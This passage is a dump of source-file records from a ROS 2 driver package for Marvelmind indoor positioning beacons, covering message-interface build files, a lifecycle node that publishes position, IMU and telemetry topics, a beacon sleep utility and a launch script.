"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 933,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 39,
"path": "/marvelmind_interfaces/CMakeLists.txt",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.5)\nproject(marvelmind_interfaces)\n\n## Default to C99\n#if(NOT CMAKE_C_STANDARD)\n# set(CMAKE_C_STANDARD 99)\n#endif()\n\n## Default to C++14\n#if(NOT CMAKE_CXX_STANDARD)\n# set(CMAKE_CXX_STANDARD 14)\n#endif()\n\n#if(CMAKE_COMPILER_IS_GNUCXX OR CMAKE_CXX_COMPILER_ID MATCHES \"Clang\")\n# add_compile_options(-Wall -Wextra -Wpedantic)\n#endif()\n\n# find dependencies\nfind_package(ament_cmake REQUIRED)\nfind_package(rosidl_default_generators REQUIRED)\nfind_package(builtin_interfaces REQUIRED)\n\n# Custom interfaces\nrosidl_generate_interfaces(${PROJECT_NAME}\n \"msg/BeaconDistance.msg\"\n \"msg/BeaconPosA.msg\"\n \"msg/HedgeImuFusion.msg\"\n \"msg/HedgeImuRaw.msg\"\n \"msg/HedgePos.msg\"\n \"msg/HedgePosA.msg\"\n \"msg/HedgePosAng.msg\"\n \"msg/HedgeQuality.msg\"\n \"msg/HedgeTelemetry.msg\"\n \"msg/MarvelmindWaypoint.msg\"\n DEPENDENCIES builtin_interfaces\n )\n\nament_export_dependencies(rosidl_default_runtime)\nament_package()\n"
},
{
"alpha_fraction": 0.7900750637054443,
"alphanum_fraction": 0.7907280325889587,
"avg_line_length": 45.40909194946289,
"blob_id": "5d5ea7a632c91f21b619c2d5094c4cc60839a328",
"content_id": "6083e3246eefe7a260b8c4c9f604c2ff8e4b090f",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6126,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 132,
"path": "/marvelmind_nav/include/marvelmind_nav/marvelmind_navigation.hpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#ifndef MARVELMIND_NAVIGATION_H\n#define MARVELMIND_NAVIGATION_H\n\n#include <fcntl.h>\n#include <iostream>\n#include <semaphore.h>\n#include <sstream>\n#include <stdbool.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <chrono>\n\n#include \"rclcpp/rclcpp.hpp\"\n#include \"rclcpp_lifecycle/lifecycle_node.hpp\"\n#include \"rclcpp_lifecycle/lifecycle_publisher.hpp\"\n\n#include \"marvelmind_interfaces/msg/hedge_pos.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_pos_a.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_pos_ang.hpp\"\n#include \"marvelmind_interfaces/msg/beacon_pos_a.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_imu_raw.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_imu_fusion.hpp\"\n#include \"marvelmind_interfaces/msg/beacon_distance.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_telemetry.hpp\"\n#include \"marvelmind_interfaces/msg/hedge_quality.hpp\"\n#include \"marvelmind_interfaces/msg/marvelmind_waypoint.hpp\"\n#include \"std_msgs/msg/string.hpp\"\nextern \"C\"\n{\n#include \"marvelmind_nav/marvelmind_hedge.h\"\n#include \"marvelmind_nav/marvelmind_api.h\"\n}\n\n\n#define ROS_NODE_NAME \"hedge_rcv_bin\"\n#define HEDGE_POSITION_TOPIC_NAME \"hedge_pos\"\n#define HEDGE_POSITION_ADDRESSED_TOPIC_NAME \"hedge_pos_a\"\n#define HEDGE_POSITION_WITH_ANGLE_TOPIC_NAME \"hedge_pos_ang\"\n#define BEACONS_POSITION_ADDRESSED_TOPIC_NAME \"beacons_pos_a\"\n#define HEDGE_IMU_RAW_TOPIC_NAME \"hedge_imu_raw\"\n#define HEDGE_IMU_FUSION_TOPIC_NAME \"hedge_imu_fusion\"\n#define BEACON_RAW_DISTANCE_TOPIC_NAME \"beacon_raw_distance\"\n#define HEDGE_TELEMETRY_TOPIC_NAME \"hedge_telemetry\"\n#define HEDGE_QUALITY_TOPIC_NAME \"hedge_quality\"\n#define MARVELMIND_WAYPOINT_TOPIC_NAME \"marvelmind_waypoint\"\n\n\n\nclass MarvelmindNavigation : public rclcpp_lifecycle::LifecycleNode\n{\npublic:\n explicit MarvelmindNavigation(const std::string & node_name,int argc, char **argv, bool intra_process_comms=false)\n : rclcpp_lifecycle::LifecycleNode(node_name, rclcpp::NodeOptions().use_intra_process_comms(intra_process_comms)),\n argc_(argc),argv_(argv)\n{}\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_activate(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_deactivate(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_error(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_cleanup(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_configure(const rclcpp_lifecycle::State &);\n rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn on_shutdown(const rclcpp_lifecycle::State &);\n~MarvelmindNavigation() {}\n\nprivate:\n int argc_;\n char **argv_;\n std::shared_ptr<rclcpp::TimerBase> timer_;\n bool are_publishers_active_;\n uint8_t beaconReadIterations;\n\n struct MarvelmindHedge * hedge= NULL;\n struct timespec ts;\n\n static uint32_t hedge_timestamp_prev;\n// static sem_t *sem;\n\n marvelmind_interfaces::msg::HedgePos hedge_pos_noaddress_msg;// hedge coordinates message (old version without address) for publishing to ROS topic\n marvelmind_interfaces::msg::HedgePosA hedge_pos_msg;// hedge coordinates message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgePosAng hedge_pos_ang_msg;// hedge coordinates and angle message for publishing to ROS topic\n 
marvelmind_interfaces::msg::BeaconPosA beacon_pos_msg;// stationary beacon coordinates message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgeImuRaw hedge_imu_raw_msg;// raw IMU data message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgeImuFusion hedge_imu_fusion_msg;// IMU fusion data message for publishing to ROS topic\n marvelmind_interfaces::msg::BeaconDistance beacon_raw_distance_msg;// Raw distance message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgeTelemetry hedge_telemetry_msg;// Telemetry message for publishing to ROS topic\n marvelmind_interfaces::msg::HedgeQuality hedge_quality_msg;// Quality message for publishing to ROS topic\n marvelmind_interfaces::msg::MarvelmindWaypoint marvelmind_waypoint_msg;// Waypoint message for publishing to ROS topic\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgePosAng>> hedge_pos_ang_publisher_;\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgePosA>> hedge_pos_publisher_;\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgePos>> hedge_pos_noaddress_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::BeaconPosA>> beacons_pos_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgeImuRaw>> hedge_imu_raw_publisher_;\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgeImuFusion>> hedge_imu_fusion_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::BeaconDistance>> beacon_distance_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgeTelemetry>> hedge_telemetry_publisher_;\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::HedgeQuality>> hedge_quality_publisher_;\n\n std::shared_ptr<rclcpp_lifecycle::LifecyclePublisher<marvelmind_interfaces::msg::MarvelmindWaypoint>> marvelmind_waypoint_publisher_;\n\n\n\n// Marvelmind internal functions\n int hedgeReceivePrepare();\n bool hedgeReceiveCheck();\n bool beaconReceiveCheck();\n bool hedgeIMURawReceiveCheck();\n bool hedgeIMUFusionReceiveCheck();\n void getRawDistance(uint8_t index);\n bool hedgeTelemetryUpdateCheck();\n bool hedgeQualityUpdateCheck();\n bool marvelmindWaypointUpdateCheck();\n\n// LC node functions\n void activateAllPublishers();\n void createPublishers();\n void deactivateAllPublishers();\n void resetAllPublishers();\n void setMessageDefaults();\n\n void main_loop();\n void marvelmindAPILoad();\n void marvelmindAPIFree();\n\n};\n\n\n\n#endif // MARVELMIND_NAVIGATION_H\n"
},
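// A hedged sketch of hosting the MarvelmindNavigation lifecycle node declared
// above (the package's actual entry point lives in marvelmind_navigation.cpp,
// which is not fully shown here). Lifecycle transitions are normally driven
// externally, e.g. by marvel_driver_launch.py; spinning the executor lets the
// node serve those configure/activate requests. argc/argv are forwarded
// because hedgeReceivePrepare() reads the tty device and baud rate from them.
#include <memory>
#include "rclcpp/rclcpp.hpp"
#include "marvelmind_nav/marvelmind_navigation.hpp"

int main(int argc, char **argv)
{
    rclcpp::init(argc, argv);
    auto node = std::make_shared<MarvelmindNavigation>(ROS_NODE_NAME, argc, argv);
    rclcpp::executors::SingleThreadedExecutor executor;
    executor.add_node(node->get_node_base_interface());
    executor.spin(); // lifecycle services drive configure/activate/shutdown
    rclcpp::shutdown();
    return 0;
}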
{
"alpha_fraction": 0.6450742483139038,
"alphanum_fraction": 0.662618100643158,
"avg_line_length": 20.823530197143555,
"blob_id": "f73216330d1b263a7080fc6b8a80fbea3a2fa777",
"content_id": "e8e91148e889afae89ebc7ecceca58d70345c030",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 741,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 34,
"path": "/marvelmind_nav/src/sleep_beacon_node.cpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include <chrono>\n#include <string>\n#include <iostream> \n#include \"rclcpp/rclcpp.hpp\"\n#include \"std_msgs/msg/string.hpp\"\nextern \"C\"\n{\n#include \"marvelmind_nav/marvelmind_example.h\"\n#include \"marvelmind_nav/marvelmind_devices.h\"\n#include \"marvelmind_nav/marvelmind_utils.h\"\n#include \"marvelmind_nav/marvelmind_pos.h\"\n#include \"marvelmind_nav/marvelmind_api.h\"\n}\n\nusing namespace std::chrono_literals;\n\n\nint main()\n{\n marvelmindStart();\n char str[7] = {'s', 'l', 'e', 'e', 'p', ' ', '0'};\n char *token1 = strtok(str, \" \");\n trim(token1);\n char *token2 = strtok(NULL, \" \");\n while(!marvelmindCycle());\n while(marvelmindCheckSleepCommand(token1, token2));\n sleep_ms(10000);\n \n\n\n marvelmindFinish();\n\n return 0;\n}"
},
{
"alpha_fraction": 0.6800100207328796,
"alphanum_fraction": 0.6825118660926819,
"avg_line_length": 38.186275482177734,
"blob_id": "0e1af853721cb4c5d9dabcd8078b97b443c60e61",
"content_id": "dc57e369aeabe76635eaaaeb1e87cdd6c1eb9072",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3997,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 102,
"path": "/marvelmind_nav/launch/marvel_driver_launch.py",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "# Based on https://github.com/ros2/launch_ros/blob/master/launch_ros/examples/lifecycle_pub_sub_launch.py \n\n\"\"\"Launch a lifecycle marvel_node.\"\"\"\n\nimport os\nimport sys\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..')) # noqa\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', 'launch')) # noqa\n\nimport launch\nimport launch.actions\nimport launch.events\n\nfrom launch.actions import DeclareLaunchArgument, IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nfrom launch.substitutions import LaunchConfiguration, ThisLaunchFileDir\n# from launch import LaunchDescription\n# from launch_ros import get_default_launch_description\n\nfrom launch.launch_context import LaunchContext\n\nimport launch_ros.actions\nimport launch_ros.events\nimport launch_ros.events.lifecycle\n\nimport lifecycle_msgs.msg\n\ndef generate_launch_description(argv=sys.argv[1:]):\n \"\"\"Run lifecycle nodes via launch.\"\"\"\n ld = launch.LaunchDescription()\n\n port = LaunchConfiguration('port')\n declare_port_cmd = DeclareLaunchArgument(\n 'port',\n default_value='/dev/ttyACM0',\n description='Port for serial comm')\n ld.add_action(declare_port_cmd)\n\n context = LaunchContext()\n # print(\"Port is: {}\".format(port.perform(context)))\n # Prepare the marvel node.\n marvel_node = launch_ros.actions.LifecycleNode(\n node_name='marvelmind_nav', \n package='marvelmind_nav', \n node_executable='marvelmind_nav', \n output='screen',\n arguments=['/dev/ttyACM0','9600'])\n\n # When the marvel reaches the 'inactive' state, make it take the 'activate' transition.\n register_event_handler_for_marvel_reaches_inactive_state = launch.actions.RegisterEventHandler(\n launch_ros.event_handlers.OnStateTransition(\n target_lifecycle_node=marvel_node, goal_state='inactive',\n entities=[\n launch.actions.LogInfo(\n msg=\"node 'marvelmind_nav' reached the 'inactive' state, 'activating'.\"),\n launch.actions.EmitEvent(\n event=launch_ros.events.lifecycle.ChangeState(\n lifecycle_node_matcher=launch.events.matches_action(marvel_node),\n transition_id=lifecycle_msgs.msg.Transition.TRANSITION_ACTIVATE,\n )),\n ],\n )\n )\n\n # When the marvel node reaches the 'active' state, log a message \n register_event_handler_for_marvel_reaches_active_state = launch.actions.RegisterEventHandler(\n launch_ros.event_handlers.OnStateTransition(\n target_lifecycle_node=marvel_node, goal_state='active',\n entities=[\n launch.actions.LogInfo(\n msg=\"node 'marvelmind_nav' reached the 'active' state.\")\n ],\n )\n )\n\n # Make the marvel node take the 'configure' transition.\n emit_event_to_request_that_marvel_does_configure_transition = launch.actions.EmitEvent(\n event=launch_ros.events.lifecycle.ChangeState(\n lifecycle_node_matcher=launch.events.matches_action(marvel_node),\n transition_id=lifecycle_msgs.msg.Transition.TRANSITION_CONFIGURE,\n )\n )# Add the actions to the launch description.\n # The order they are added reflects the order in which they will be executed.\n ld.add_action(register_event_handler_for_marvel_reaches_inactive_state)\n ld.add_action(register_event_handler_for_marvel_reaches_active_state)\n ld.add_action(marvel_node)\n ld.add_action(emit_event_to_request_that_marvel_does_configure_transition)\n \n\n # print('Starting introspection of launch description...')\n # print('')\n\n # print(launch.LaunchIntrospector().format_launch_description(ld))\n\n print('')\n print('Starting launch of launch description...')\n print('')\n\n # ls = 
launch.LaunchService(argv=argv, debug=True)\n ls = launch.LaunchService(argv=argv)\n ls.include_launch_description(ld)\n return ld\n"
},
{
"alpha_fraction": 0.6294928193092346,
"alphanum_fraction": 0.6449680328369141,
"avg_line_length": 34.8336296081543,
"blob_id": "a3667648978b4f1c51c517302989e88c03e87d49",
"content_id": "260a8dbafec20ba5a1a1c882a7222a9ffe110517",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 20032,
"license_type": "permissive",
"max_line_length": 151,
"num_lines": 559,
"path": "/marvelmind_nav/src/marvelmind_navigation.cpp",
"repo_name": "aminballoon/ros_marvelmind_package",
"src_encoding": "UTF-8",
"text": "#include \"marvelmind_nav/marvelmind_navigation.hpp\"\n\nuint32_t MarvelmindNavigation::hedge_timestamp_prev = 0;\nstatic sem_t *sem;\nvoid semCallback()\n{\n sem_post(sem);\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_activate(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On activate at \" << this->now().seconds());\n activateAllPublishers();\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_deactivate(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On deactivate at \" << this->now().seconds());\n deactivateAllPublishers();\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_error(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On error at \" << this->now().seconds());\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_cleanup(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On cleanup at \" << this->now().seconds());\n resetAllPublishers();\n timer_.reset();\n if (hedge != NULL)\n {\n stopMarvelmindHedge (hedge);\n destroyMarvelmindHedge (hedge);\n }\n sem_close(sem);\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_configure(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On configure at \" << this->now().seconds());\n\n sem = sem_open(DATA_INPUT_SEMAPHORE, O_CREAT, 0777, 0);\n\n hedgeReceivePrepare();\n createPublishers();\n setMessageDefaults();\n\n timer_ = this->create_wall_timer(std::chrono::duration<double>(0.005)\n ,std::bind(&MarvelmindNavigation::main_loop, this));\n\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nrclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn MarvelmindNavigation::on_shutdown(const rclcpp_lifecycle::State &)\n{\n RCLCPP_INFO_STREAM(get_logger(),std::fixed << \"On shutdown at \" << this->now().seconds());\n deactivateAllPublishers();\n timer_.reset();\n if (hedge != NULL)\n {\n stopMarvelmindHedge (hedge);\n destroyMarvelmindHedge (hedge);\n }\n sem_close(sem);\n return rclcpp_lifecycle::node_interfaces::LifecycleNodeInterface::CallbackReturn::SUCCESS;\n}\n\nint MarvelmindNavigation::hedgeReceivePrepare()\n{\n // get port name from command line arguments (if specified)\n const char * ttyFileName;\n uint32_t baudRate;\n if (argc_>=2) ttyFileName=argv_[1];\n else ttyFileName=DEFAULT_TTY_FILENAME;\n if (argc_>=3) baudRate= atoi(argv_[2]);\n else baudRate=DEFAULT_TTY_BAUDRATE;\n\n // Init\n hedge=createMarvelmindHedge ();\n if (hedge==NULL)\n {\n RCLCPP_INFO(get_logger(),\"Error: Unable to create MarvelmindHedge\");\n return -1;\n }\n\n hedge->ttyFileName=ttyFileName;\n hedge->baudRate= baudRate;\n hedge->verbose=true; // show errors and warnings\n hedge->anyInputPacketCallback= semCallback;\n\n RCLCPP_INFO_STREAM(get_logger(),\"Creating a connection 
at: \" << argv_[1] << \" with baud rate: \" << argv_[2]);\n startMarvelmindHedge(hedge);\n return 1;\n}\n\nbool MarvelmindNavigation::hedgeReceiveCheck()\n{\n if (hedge->haveNewValues_)\n {\n struct PositionValue position;\n getPositionFromMarvelmindHedge (hedge, &position);\n\n hedge_pos_msg.address= position.address;\n hedge_pos_ang_msg.address= position.address;\n\n hedge_pos_msg.flags= position.flags;\n hedge_pos_noaddress_msg.flags= position.flags;\n hedge_pos_ang_msg.flags= position.flags;\n if (hedge_pos_msg.flags&(1<<1))// flag of timestamp format\n {\n hedge_pos_msg.timestamp_ms= position.timestamp;// msec\n hedge_pos_noaddress_msg.timestamp_ms= position.timestamp;\n }\n else\n {\n hedge_pos_msg.timestamp_ms= position.timestamp*15.625;// alpha-cycles ==> msec\n hedge_pos_noaddress_msg.timestamp_ms= position.timestamp*15.625;\n }\n hedge_pos_ang_msg.timestamp_ms= position.timestamp;\n\n hedge_pos_msg.x_m= position.x/1000.0;\n hedge_pos_msg.y_m= position.y/1000.0;\n hedge_pos_msg.z_m= position.z/1000.0;\n\n hedge_pos_noaddress_msg.x_m= position.x/1000.0;\n hedge_pos_noaddress_msg.y_m= position.y/1000.0;\n hedge_pos_noaddress_msg.z_m= position.z/1000.0;\n\n hedge_pos_ang_msg.x_m= position.x/1000.0;\n hedge_pos_ang_msg.y_m= position.y/1000.0;\n hedge_pos_ang_msg.z_m= position.z/1000.0;\n\n hedge_pos_ang_msg.angle= position.angle;\n\n hedge->haveNewValues_=false;\n\n return true;\n }\n return false;\n}\n\nbool MarvelmindNavigation::beaconReceiveCheck()\n{\n uint8_t i;\n struct StationaryBeaconsPositions positions;\n struct StationaryBeaconPosition *bp= NULL;\n bool foundUpd= false;\n uint8_t n;\n\n getStationaryBeaconsPositionsFromMarvelmindHedge (hedge, &positions);\n n= positions.numBeacons;\n if (n == 0)\n return false;\n\n for(i=0;i<n;i++)\n {\n bp= &positions.beacons[i];\n if (bp->updatedForMsg)\n {\n clearStationaryBeaconUpdatedFlag(hedge, bp->address);\n foundUpd= true;\n break;\n }\n }\n if (!foundUpd)\n return false;\n if (bp == NULL)\n return false;\n\n beacon_pos_msg.address= bp->address;\n beacon_pos_msg.x_m= bp->x/1000.0;\n beacon_pos_msg.y_m= bp->y/1000.0;\n beacon_pos_msg.z_m= bp->z/1000.0;\n\n return true;\n}\n\nbool MarvelmindNavigation::hedgeIMURawReceiveCheck()\n{\n if (!hedge->rawIMU.updated)\n return false;\n\n hedge_imu_raw_msg.acc_x= hedge->rawIMU.acc_x;\n hedge_imu_raw_msg.acc_y= hedge->rawIMU.acc_y;\n hedge_imu_raw_msg.acc_z= hedge->rawIMU.acc_z;\n\n hedge_imu_raw_msg.gyro_x= hedge->rawIMU.gyro_x;\n hedge_imu_raw_msg.gyro_y= hedge->rawIMU.gyro_y;\n hedge_imu_raw_msg.gyro_z= hedge->rawIMU.gyro_z;\n\n hedge_imu_raw_msg.compass_x= hedge->rawIMU.compass_x;\n hedge_imu_raw_msg.compass_y= hedge->rawIMU.compass_y;\n hedge_imu_raw_msg.compass_z= hedge->rawIMU.compass_z;\n\n hedge_imu_raw_msg.timestamp_ms= hedge->rawIMU.timestamp;\n\n hedge->rawIMU.updated= false;\n\n return true;\n\n}\n\nbool MarvelmindNavigation::hedgeIMUFusionReceiveCheck()\n{\n if (!hedge->fusionIMU.updated)\n return false;\n\n hedge_imu_fusion_msg.x_m= hedge->fusionIMU.x/1000.0;\n hedge_imu_fusion_msg.y_m= hedge->fusionIMU.y/1000.0;\n hedge_imu_fusion_msg.z_m= hedge->fusionIMU.z/1000.0;\n\n hedge_imu_fusion_msg.qw= hedge->fusionIMU.qw/10000.0;\n hedge_imu_fusion_msg.qx= hedge->fusionIMU.qx/10000.0;\n hedge_imu_fusion_msg.qy= hedge->fusionIMU.qy/10000.0;\n hedge_imu_fusion_msg.qz= hedge->fusionIMU.qz/10000.0;\n\n hedge_imu_fusion_msg.vx= hedge->fusionIMU.vx/1000.0;\n hedge_imu_fusion_msg.vy= hedge->fusionIMU.vy/1000.0;\n hedge_imu_fusion_msg.vz= hedge->fusionIMU.vz/1000.0;\n\n 
hedge_imu_fusion_msg.ax= hedge->fusionIMU.ax/1000.0;\n hedge_imu_fusion_msg.ay= hedge->fusionIMU.ay/1000.0;\n hedge_imu_fusion_msg.az= hedge->fusionIMU.az/1000.0;\n\n hedge_imu_fusion_msg.timestamp_ms= hedge->fusionIMU.timestamp;\n\n hedge->fusionIMU.updated= false;\n\n return true;\n}\n\nvoid MarvelmindNavigation::getRawDistance(uint8_t index)\n{\n beacon_raw_distance_msg.address_hedge= hedge->rawDistances.address_hedge;\n beacon_raw_distance_msg.address_beacon= hedge->rawDistances.distances[index].address_beacon;\n beacon_raw_distance_msg.distance_m= hedge->rawDistances.distances[index].distance/1000.0;\n}\n\nbool MarvelmindNavigation::hedgeTelemetryUpdateCheck()\n{\n if (!hedge->telemetry.updated)\n return false;\n\n hedge_telemetry_msg.battery_voltage= hedge->telemetry.vbat_mv/1000.0;\n hedge_telemetry_msg.rssi_dbm= hedge->telemetry.rssi_dbm;\n\n hedge->telemetry.updated= false;\n return true;\n}\n\nbool MarvelmindNavigation::hedgeQualityUpdateCheck()\n{\n if (!hedge->quality.updated)\n return false;\n\n hedge_quality_msg.address= hedge->quality.address;\n hedge_quality_msg.quality_percents= hedge->quality.quality_per;\n\n hedge->quality.updated= false;\n return true;\n}\n\nbool MarvelmindNavigation::marvelmindWaypointUpdateCheck()\n{\n uint8_t i,n;\n uint8_t nUpdated;\n\n if (!hedge->waypoints.updated)\n return false;\n\n nUpdated= 0;\n n= hedge->waypoints.numItems;\n for(i=0;i<n;i++)\n {\n if (!hedge->waypoints.items[i].updated)\n continue;\n\n nUpdated++;\n if (nUpdated == 1)\n {\n marvelmind_waypoint_msg.total_items= n;\n marvelmind_waypoint_msg.item_index= i;\n\n marvelmind_waypoint_msg.movement_type= hedge->waypoints.items[i].movementType;\n marvelmind_waypoint_msg.param1= hedge->waypoints.items[i].param1;\n marvelmind_waypoint_msg.param2= hedge->waypoints.items[i].param2;\n marvelmind_waypoint_msg.param3= hedge->waypoints.items[i].param3;\n\n hedge->waypoints.items[i].updated= false;\n }\n }\n\n if (nUpdated==1)\n {\n hedge->waypoints.updated= false;\n }\n return (nUpdated>0);\n}\n\nvoid MarvelmindNavigation::activateAllPublishers()\n{\n hedge_pos_ang_publisher_->on_activate();\n hedge_pos_publisher_->on_activate();\n hedge_pos_noaddress_publisher_->on_activate();\n beacons_pos_publisher_->on_activate();\n hedge_imu_raw_publisher_->on_activate();\n hedge_imu_fusion_publisher_->on_activate();\n beacon_distance_publisher_->on_activate();\n hedge_telemetry_publisher_->on_activate();\n hedge_quality_publisher_->on_activate();\n marvelmind_waypoint_publisher_->on_activate();\n are_publishers_active_= true;\n}\n\nvoid MarvelmindNavigation::deactivateAllPublishers()\n{\n hedge_pos_ang_publisher_->on_deactivate();\n hedge_pos_publisher_->on_deactivate();\n hedge_pos_noaddress_publisher_->on_deactivate();\n beacons_pos_publisher_->on_deactivate();\n hedge_imu_raw_publisher_->on_deactivate();\n hedge_imu_fusion_publisher_->on_deactivate();\n beacon_distance_publisher_->on_deactivate();\n hedge_telemetry_publisher_->on_deactivate();\n hedge_quality_publisher_->on_deactivate();\n marvelmind_waypoint_publisher_->on_deactivate();\n are_publishers_active_ = false;\n}\n\nvoid MarvelmindNavigation::resetAllPublishers()\n{\n hedge_pos_ang_publisher_.reset();\n hedge_pos_publisher_.reset();\n hedge_pos_noaddress_publisher_.reset();\n beacons_pos_publisher_.reset();\n hedge_imu_raw_publisher_.reset();\n hedge_imu_fusion_publisher_.reset();\n beacon_distance_publisher_.reset();\n hedge_telemetry_publisher_.reset();\n hedge_quality_publisher_.reset();\n marvelmind_waypoint_publisher_.reset();\n 
are_publishers_active_ = false;\n}\n\nvoid MarvelmindNavigation::setMessageDefaults()\n{\n // default values for position message\n hedge_pos_ang_msg.address= 0;\n hedge_pos_ang_msg.timestamp_ms = 0;\n hedge_pos_ang_msg.x_m = 0.0;\n hedge_pos_ang_msg.y_m = 0.0;\n hedge_pos_ang_msg.z_m = 0.0;\n hedge_pos_ang_msg.flags = (1<<0);// 'data not available' flag\n hedge_pos_ang_msg.angle= 0.0;\n\n hedge_pos_msg.address= 0;\n hedge_pos_msg.timestamp_ms = 0;\n hedge_pos_msg.x_m = 0.0;\n hedge_pos_msg.y_m = 0.0;\n hedge_pos_msg.z_m = 0.0;\n hedge_pos_msg.flags = (1<<0);// 'data not available' flag\n\n hedge_pos_noaddress_msg.timestamp_ms = 0;\n hedge_pos_noaddress_msg.x_m = 0.0;\n hedge_pos_noaddress_msg.y_m = 0.0;\n hedge_pos_noaddress_msg.z_m = 0.0;\n hedge_pos_noaddress_msg.flags = (1<<0);// 'data not available' flag\n\n beacon_pos_msg.address= 0;\n beacon_pos_msg.x_m = 0.0;\n beacon_pos_msg.y_m = 0.0;\n beacon_pos_msg.z_m = 0.0;\n}\n\nvoid MarvelmindNavigation::createPublishers()\n{\n rclcpp::QoS qos(rclcpp::QoSInitialization::from_rmw(rmw_qos_profile_sensor_data));\n\n hedge_pos_ang_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgePosAng>(HEDGE_POSITION_WITH_ANGLE_TOPIC_NAME, qos);\n hedge_pos_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgePosA>(HEDGE_POSITION_ADDRESSED_TOPIC_NAME, qos);\n hedge_pos_noaddress_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgePos>(HEDGE_POSITION_TOPIC_NAME, qos);\n\n beacons_pos_publisher_ = this->create_publisher<marvelmind_interfaces::msg::BeaconPosA>(BEACONS_POSITION_ADDRESSED_TOPIC_NAME, qos);\n\n hedge_imu_raw_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgeImuRaw>(HEDGE_IMU_RAW_TOPIC_NAME, qos);\n hedge_imu_fusion_publisher_ = this->create_publisher<marvelmind_interfaces::msg::HedgeImuFusion>(HEDGE_IMU_FUSION_TOPIC_NAME, qos);\n\n beacon_distance_publisher_ = this->create_publisher<marvelmind_interfaces::msg::BeaconDistance>(BEACON_RAW_DISTANCE_TOPIC_NAME, qos);\n\n hedge_telemetry_publisher_ = 